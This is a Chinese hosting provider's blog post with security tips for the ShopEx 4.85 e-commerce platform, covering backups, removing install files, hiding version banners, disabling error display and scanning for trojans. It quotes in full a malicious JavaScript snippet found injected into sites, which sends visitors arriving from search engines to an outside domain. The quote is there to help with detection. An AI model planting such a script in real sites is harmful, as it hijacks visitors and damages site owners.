2014年shopex 4.85最新安全设置总结

Shopex是一个非常成熟、优秀的网店销售平台。由于他是一个免费的php开源系统，从而使用的人自然而然的就会多起来，用的人多了，研究的人也会就随之多起来，时不时的有一些安全漏洞也是在所难免的！数据无价，资源无价，假若一个商城被攻击，或被挂马等操作后果就不堪设想，我想各位站长、开店的老板们也不想看着自己因为安全措施不到位而出现损失现象吧！那么就跟随无忧主机小编强化Shopex安全设置吧！ 无忧主机在很久以前也有一篇“Shopex安全设置 ”文章，在此就不重述了，只为安全设置做更完善的补充，列出一下几点： 1.定期做好网站备份，什么都不要说，备份好了数据就不会丢失，这是硬道理！小编一直强调。 2.删除安装文件install；程序安装好了就不需要安装第二次了，需要的话，再重新上传到空间上面，不需要的话很容易被利用，因为里面有涉及到检测系统环境的文件。 3.隐藏程序版权，避免开源程序暴露；这种版权修改的越彻底越好，如果别人不知道你的网站程序是什么，就不知道怎么黑你了，不知道怎么黑你，是不是就躲过一劫了呢？补充知识“SHOPEX去除底部版权信息“POWERED BY SHOPEX V4.8.5 ””、“ SHOPEX如何修改底部版权信息”。 4.程序环境安全配置；关闭错误页面信息显示display_errors=Off，可以防止某些程序在报错的时候无意中泄露网站物理路径，避免被黑客利用；在ShopEx的config.php文件中配置ini_set("display_errors","Off"); 5.网站日常维护时偶尔扫描下木马，检查是否有文件被修改，如果觉得网站不对劲，或者是发现了一些可疑文件，尽快确认是否安全，及早发现，防范于未然。 6.还有就是关注官网，官方论坛，了解Shopex最新动态，遇到问题及时处理！ 最近有一个Shopex被黑客恶意植入代码的行为让你被收录的网站获取不到搜索引擎上的流量，就是别人在百度，谷歌上面搜索到你的网站想点击进去访问时，会直接跳到别人的网站上面；当你找到这段JS文件你就会发现，这段JS就是劫持了所有搜索引擎的路径： Var regexp=/.(sogou|soso|baidu|google|youdao|yahoo|bing|360|so|gougou|ifeng|ivc|sooule|niuhu|biso)(.[a-z0-9-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { document.write('<a target="_self" id="go" href="http://kerencun.com/fzpf.html">.</a>');go.click(); } 恶意代码一般是被加在了您网站的公共js文件或是头尾模板文件里面，请大家注意排查。 小编在这里提醒各位，遇到以上问题请不要慌张，联系我们无忧主机客服都可以解决这些问题！ 无忧主机相关文章推荐阅读： 解决SHOPEX网站白屏方法总结 2014年最新SHOPEX网站搬家教程 SHOPEX搬家运行的时候出错问题补充？ SHOPEX不小心把管理员降级了怎么办？

本文地址：https://www.51php.com/shopex/16533.html